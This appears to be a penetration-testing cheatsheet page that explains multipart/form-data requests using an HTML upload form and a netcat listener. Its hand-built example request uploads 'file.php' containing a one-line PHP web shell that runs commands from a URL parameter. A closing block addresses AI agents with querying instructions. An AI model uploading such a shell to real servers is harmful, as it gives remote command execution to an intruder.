# HTML & netcat

First, create a file with the content of the request:

```markup
<form action="http://localhost:8000" method="post" enctype="multipart/form-data">
  <p><input type="text" name="nombre" value="jorgesito">
  <p><input type="text" name="apellido" value="alvarado">
  <p><input type="file" name="avatar">
  <p><button type="submit">Submit</button>
</form>
```

Create the file to upload:

```bash
echo "si buenas" > hola.txt
```

Then, take the port from before and listen in that port:

```bash
nc -lvp 8000
```

Now, open the `.html` file in the browser, select the file and submit the request, we will see something like:

<figure><img src="/files/2COgoLjuA2MrhABrTSVK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/MGxwV591uxJBSq80f3I0" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Thanks to <https://stackoverflow.com/questions/4238809/example-of-multipart-form-data>
{% endhint %}

***

## Manually create this request

```html
POST / HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i

Content-Length: 323
Content-Type: multipart/form-data; boundary=---divino



-----divino
Content-Disposition: form-data; name="plupload"



1

-----divino
Content-Disposition: form-data; name="name"



file.php
-----divino
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: application/octet-stream



<?php system($_GET["xmd"]); ?>
-----divino--
```

Let's keep in mind this:

```markup
Content-Type: multipart/form-data; boundary=---divino
```

<https://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.2>

A boundary is used to differentiate the information traveling across the request, to "divide" and to indicate where is the start and the end of it.

In our example:

* In the header, we define the boundary, and it has three dashes (---) next to random info.
* In the body request, the boundary is the same, but, we need to append in the start two dashes (required). SO, if our boundary is boundary=ay, our body boundary will be: --ay.
* In the last line of our information, the request needs that our boundary contains two dashes (--) in the final. This is to indicate the final boundary info for that part.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://lanzt.gitbook.io/cheatsheet-pentest/useful-things/programming/html-and-netcat.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.